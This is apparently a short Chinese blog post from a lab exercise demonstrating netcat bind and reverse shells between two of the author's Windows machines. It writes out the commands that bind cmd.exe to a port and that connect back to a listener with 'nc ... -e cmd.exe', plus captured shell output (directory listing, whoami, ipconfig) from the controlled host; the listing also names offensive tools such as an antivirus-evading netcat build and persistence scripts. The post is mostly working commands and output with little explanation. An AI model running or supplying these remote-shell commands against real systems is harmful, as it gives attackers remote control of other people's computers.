nc远控反弹shell小实践

原创

bonelee 2023-06-01 10:29:08 ©著作权

文章标签 安全分析 Windows Desktop 2d 文章分类 JavaScript 前端开发

©著作权归作者所有：来自51CTO博客作者bonelee的原创作品，请联系作者获取转载授权，否则将追究法律责任

正向shell：

132机器A上：==>是c2的client

nc.exe -L -d -e cmd.exe -p 5555

134机器B上：

nc64.exe XXX.132 5555

然后就可以输入命令远控132机器了！

我的nc都放在了桌面，所以在桌面cmd即可！

反弹shell例子：

134主机A上，运行如下命令监听8888端口：

C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\qiankun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C6C4-46F7

 Directory of C:\Users\qiankun\Desktop

08/01/2022  01:23 AM    <DIR>          .
08/01/2022  01:23 AM    <DIR>          ..
05/11/2022  01:09 AM    <DIR>          619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022  08:35 PM    <DIR>          80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022  12:38 AM    <DIR>          aaabitsadmin.exe.ps1
05/16/2022  12:30 AM               616 aaabitsadmin.exe.ps1.zip
05/24/2022  12:13 AM                 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022  10:32 PM       104,857,751 Agent.log
05/23/2022  02:38 AM                 3 agent.ps1
06/13/2022  02:14 AM         8,447,018 Agent_1.log
06/09/2022  11:48 PM    <DIR>          b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022  11:37 PM         1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022  07:55 PM               208 bitsadmin.exe.ps1
08/04/2017  02:19 AM            75,418 COM Object hijacking persistence.ps1
04/21/2022  02:30 AM    <DIR>          dev
04/14/2022  11:22 PM               167 exit.bat
03/24/2022  08:41 AM             2,348 Microsoft Edge.lnk
04/19/2022  12:30 AM            24,896 msxsl.exe
07/31/2022  09:00 PM            38,616 nc.exe
07/31/2022  09:00 PM            45,272 nc64.exe
08/01/2022  01:14 AM         5,980,919 nc_miansha.exe
04/13/2022  11:23 PM         1,436,160 NeverLose.bin.exe
05/23/2022  02:37 AM                 0 New Text Document.txt
05/23/2022  02:49 AM    <DIR>          nishang-master
05/23/2022  02:39 AM            80,249 nishang-master.zip
06/10/2022  12:42 AM    <DIR>          Office Tool
06/09/2022  11:54 PM     2,085,551,571 Office Tool.zip
05/18/2022  02:43 AM    <DIR>          phpStudy_64
05/17/2022  07:55 PM        81,485,042 phpStudy_64.zip
07/31/2022  10:04 PM    <DIR>          PSTools
07/31/2022  09:10 PM         4,089,627 PSTools.zip
05/23/2022  11:39 PM    <DIR>          QianKunEDR-Windows-x64-Setup
07/31/2022  07:11 PM    <DIR>          QianKunEDR-Windows-x64-Setup (5)
07/31/2022  06:51 PM        90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022  11:28 PM       108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022  11:22 PM                65 start.bat
05/06/2022  02:25 AM    <DIR>          Sysmon
05/06/2022  02:14 AM         3,263,064 Sysmon.zip
05/16/2022  02:44 AM    <DIR>          test
05/24/2022  02:10 AM            10,522 test.chm
07/31/2022  06:46 PM         3,607,096 winrarx64.610scp.exe
05/07/2022  12:53 AM    <DIR>          x64
04/14/2022  02:30 AM             1,892 XXX.sct
              27 File(s)  2,499,313,244 bytes
              16 Dir(s)  17,187,168,256 bytes free

C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun

C:\Users\qiankun\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : XXX
   IPv4 Address. . . . . . . . . . . : XXXX
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : XXX

132机器B上，运行如下命令，去主动连接A机器：

nc XXX.134IP 8888 -t -e cmd.exe

然后就可以在134机器A上控制机器B了。